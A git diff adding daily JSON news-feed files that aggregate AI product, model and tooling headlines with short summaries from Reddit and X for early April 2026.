Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training.\n\nTahuna is CLI-first, it s", + "category": "ai_research" + }, + { + "title": "Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-07T14:50:28.000Z", + "summary": "AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow.\n\nI built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. 
You can either hit record for a specific task (Focus Record) or let it run in the background where it", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-08.json b/data/news-feed-2026-04-08.json new file mode 100644 index 0000000..752fd9e --- /dev/null +++ b/data/news-feed-2026-04-08.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:33.098Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-08", + "article_count": 15, + "archived_story_count": 652, + "articles": [ + { + "title": "@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators", + "url": "https://x.com/VadimStrizheus/status/2041498727131517193", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T05:24:41.410Z", + "summary": "Vugola has launched an API for the world's first agentic clipping tool. 
Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp.", + "category": "ai_tools" + }, + { + "title": "Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders", + "url": "https://x.com/wadefoster/status/2041721371357851859", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-08T04:15:45.495Z", + "summary": "Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents.", + "category": "ai_tools" + }, + { + "title": "How I cut Claude Code usage in half (open source)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T02:41:03.000Z", + "summary": "Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts.\n\nI built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs ", + "category": "ai_tools" + }, + { + "title": "I used Claude to build a full networking protocol for AI agents. 
It’s now at 12K+ nodes across 19 countries.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-08T21:40:39.000Z", + "summary": "I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion.\n\nThe problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th", + "category": "ai_tools" + }, + { + "title": "Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T17:27:42.000Z", + "summary": "Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. 
[https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) ", + "category": "ai_tools" + }, + { + "title": "Meta Releases Muse Spark - A Natively Multimodal Reasoning model", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-08T16:44:50.000Z", + "summary": "Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration.\n\nBlog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/)", + "category": "ai_models" + }, + { + "title": "Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-08T16:27:06.000Z", + "summary": "Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. 
It builds on LFM2-VL-450M with three new capabilities:\n\n* bounding box prediction (81.28 on RefCOCO-M)\n* multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and\n* function calling support.\n\nMost production vision systems are still multi-stage: a detector, a classifier, ", + "category": "ai_models" + }, + { + "title": "Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.", + "url": "https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T16:10:58.000Z", + "summary": "It's pretty neat, used \\~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model.\n\n\n\nAnd, weights are permissively licensed (MIT) which might encourage more people to hack on it.\n\n\n\nAlso worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i", + "category": "creative_tools" + }, + { + "title": "M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T12:18:39.000Z", + "summary": "The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. 
Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc..\n\nGemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i", + "category": "ai_models" + }, + { + "title": "Last Week in Multimodal AI - Local Edition", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T05:36:35.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week:\n\n* **Google Gemma 4** \\- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine.  [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4)\n* **TII Falcon Perception** \\- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei", + "category": "ai_models" + }, + { + "title": "@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech", + "url": "https://x.com/omma_ai/status/2041622310503997632", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T05:24:41.410Z", + "summary": "Omma has launched audio generation including music and songs, sound effects, and text to speech. 
Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds.", + "category": "ai_tools" + }, + { + "title": "Review This Prompt And Feedback it.", + "url": "https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.86, + "date": "2026-04-08T09:41:43.000Z", + "summary": " ROLE\n\nYou are an expert \\[e.g. full-stack developer / product designer / ML engineer\\] with deep experience in \\[tech stack / domain\\].\n\nYour job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed.\n\n PROJECT\n\nName: \\[Project name\\]\n\nType: \\[Web app / CLI tool / API / Dashboard / Bot / etc.\\]\n\nOne-liner: \\[What it does in one sentence\\]\n\nTarget user: \\[Who will use this\\]\n\nGOAL\n\nBuild a complete, working, production-ready \\[project type\\] that", + "category": "ai_tools" + }, + { + "title": "Reddit is broken! I proved it with Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-04-08T05:34:03.000Z", + "summary": "Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma.\n\n**How I built it with Claude:**\n\nI used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. 
Claude also helped me wr", + "category": "ai_tools" + }, + { + "title": "I built an MCP that gives Claude Code its own servers to fix bugs in parallel", + "url": "https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-08T21:05:27.000Z", + "summary": "I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS \"force quit\" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other.\n\nSo I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \\~$0.03", + "category": "ai_tools" + }, + { + "title": "Turbo-OCR for high-volume image and PDF processing", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-08T23:08:06.000Z", + "summary": "I recently had to process \\~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed.\n\nThe Problem:\n\n* PaddleOCR (the most popular open source OCR): Maxed out at \\~15 img/s. GPU utilization hovered around 15%. 
Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either.\n* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-09.json b/data/news-feed-2026-04-09.json new file mode 100644 index 0000000..9edbb2b --- /dev/null +++ b/data/news-feed-2026-04-09.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:33.363Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-09", + "article_count": 15, + "archived_story_count": 616, + "articles": [ + { + "title": "Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It", + "url": "https://x.com/ghumare64/status/2042234817358462986", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. 
The architectural difference is fundamental.", + "category": "ai_tools" + }, + { + "title": "OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T12:05:50.000Z", + "summary": "OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mys", + "category": "ai_models" + }, + { + "title": "OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-09T10:54:02.000Z", + "summary": "OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource 
developer mysel", + "category": "ai_models" + }, + { + "title": "I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-09T17:59:55.000Z", + "summary": "So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town.\n\nThen I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two.\n\nThree pieces of perfect", + "category": "ai_tools" + }, + { + "title": "Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-09T03:36:27.000Z", + "summary": "Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. \n\nThe prompt caching is genuinely impressive. 
My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle", + "category": "ai_tools" + }, + { + "title": "I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.78, + "date": "2026-04-09T01:24:01.000Z", + "summary": "I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files.\n\nWhile building it, I started scanning my own projects with it. What I found was uncomfortable.\n\nIn one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database.\n\nAcross my last 5 projects, th", + "category": "ai_tools" + }, + { + "title": "your claude doesn't need a better memory, it needs a self-evolving knowledge base", + "url": "https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-04-09T14:27:00.000Z", + "summary": "https://i.redd.it/57wdspbqc6ug1.gif\n\nAndrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.\n\nI've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.\n\nThe idea: every conversation you have in claude (Desktop, claude code or any 
MCP-compatible tool like codex, cursor) gets compacted into a memory episod", + "category": "ai_tools" + }, + { + "title": "Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?", + "url": "https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-09T04:34:27.000Z", + "summary": "Honest question for people who actually use these models:\n\nThe main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns.\n\nNow that they're closing up, the calculus changes:\n\n\\- No local deployment\n\n\\- API calls go to servers in China\n\n\\- No way to verify what the model is actually doing\n\nIs this a dealbrea", + "category": "ai_tools" + }, + { + "title": "Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-09T18:17:58.000Z", + "summary": "I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \\~10 approaches)\n\nhttps://i.redd.it/ferxmyorh7ug1.gif\n\nBare model: \\~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. 
All within noise of baseline, and self-critique was actively wors", + "category": "ai_models" + }, + { + "title": "OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more", + "url": "https://www.bbc.com/news/articles/clyd032ej70o", + "source": "BBC AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-09T18:00:10.184Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T16:00:16.000Z", + "summary": "**TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**.\n\nStandard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**.\n\nSo for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a", + "category": "ai_models" + }, + { + "title": "LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence", + "url": "https://x.com/LG_AI_Research", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. 
LG's hardware and manufacturing expertise gives them unique insight into what robots need.", + "category": "ai_tools" + }, + { + "title": "Open-Source Models Can Do Everything Claude Mythos Can Do", + "url": "https://x.com/stanislavfort", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-09T14:33:10.226Z", + "summary": "Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy.", + "category": "ai_tools" + }, + { + "title": "NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation", + "url": "https://x.com/MattNiessner/status/2036019740930408905", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-09T14:29:35.589Z", + "summary": "NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. 
The integration highlights NanoBanana's versatility.", + "category": "ai_tools" + }, + { + "title": "Unused phone as AI server", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-09T14:05:51.000Z", + "summary": "If you have an unused phone lying around, you might be sitting on a tiny AI server\n\nI’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \\[Gallery as Server\\](https://github.com/xiaoyao9184/gallery)\n\nYour phone can run local AI inference\n\nYou can call it just like an OpenAI API (chat/completions, etc.)\n\nInstead of letting that hardware collect dust, you can turn it into a lightweight inference node.\n\nSo yeah—if you have more t", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-10.json b/data/news-feed-2026-04-10.json new file mode 100644 index 0000000..391cf9f --- /dev/null +++ b/data/news-feed-2026-04-10.json @@ -0,0 +1,245 @@ +{ + "generated": "2026-06-05T00:44:33.549Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-10", + "article_count": 15, + "archived_story_count": 178, + "articles": [ + { + "title": "Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore", + "url": "https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T06:08:44.000Z", + "summary": "Anthropic just made Claude Cowork generally available on all paid plans, added 
enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale.\n\nin the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev", + "category": "ai_tools" + }, + { + "title": "@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30", + "url": "https://x.com/ArtificialAnlys/status/2042457674441482736", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T05:16:11.374Z", + "summary": "HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance.", + "category": "ai_tools" + }, + { + "title": "Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions", + "url": "https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.78, + "date": "2026-04-09T22:19:44.000Z", + "summary": "If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone.\n\nI built a system that fixes this. 
It's called Memoriki - a template that combines two open source projects:\n\n**Layer 1: LLM Wiki (Karpathy's pattern)**\n\nYou drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w", + "category": "ai_tools" + }, + { + "title": "I no longer need a cloud LLM to do quick web research", + "url": "https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-10T06:51:35.000Z", + "summary": "This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally.\n\nI use Qwen3.5:27B-Q3\\_K\\_M on an RTX 4090 with a context length of \\~200,000. I get \\~40 tk/s and use about 22gb VRAM.\n\nI use it through the llama.cpp Web UI, with MCP tools enabled. 
Here are the tools I have provided it for web search/scrape:\n\n \"\"\"\n webmcp - MC", + "category": "ai_models" + }, + { + "title": "Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT", + "url": "https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-10T06:00:22.605Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale", + "url": "https://x.com/ainativedev/status/2031797311790260394", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:13.355Z", + "summary": "AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale.", + "category": "ai_tools" + }, + { + "title": "@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For", + "url": "https://x.com/hugobowne/status/2042464629214101663", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:12.382Z", + "summary": "Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. 
The skills to build monitoring and evaluation infrastructure for AI agents are in high demand.", + "category": "ai_tools" + }, + { + "title": "@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI", + "url": "https://x.com/InfluxDB/status/2042388369674469612", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-10T05:16:10.444Z", + "summary": "InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine.", + "category": "ai_tools" + }, + { + "title": "@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy", + "url": "https://x.com/Techmeme/status/2042465278462955882", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-10T05:16:08.371Z", + "summary": "Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance.", + "category": "ai_tools" + }, + { + "title": "@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare", + "url": "https://x.com/Berci/status/2042464294432858357", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-10T05:16:08.371Z", + "summary": "China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally.", + "category": "ai_tools" + }, + { + "title": "96GB Vram. 
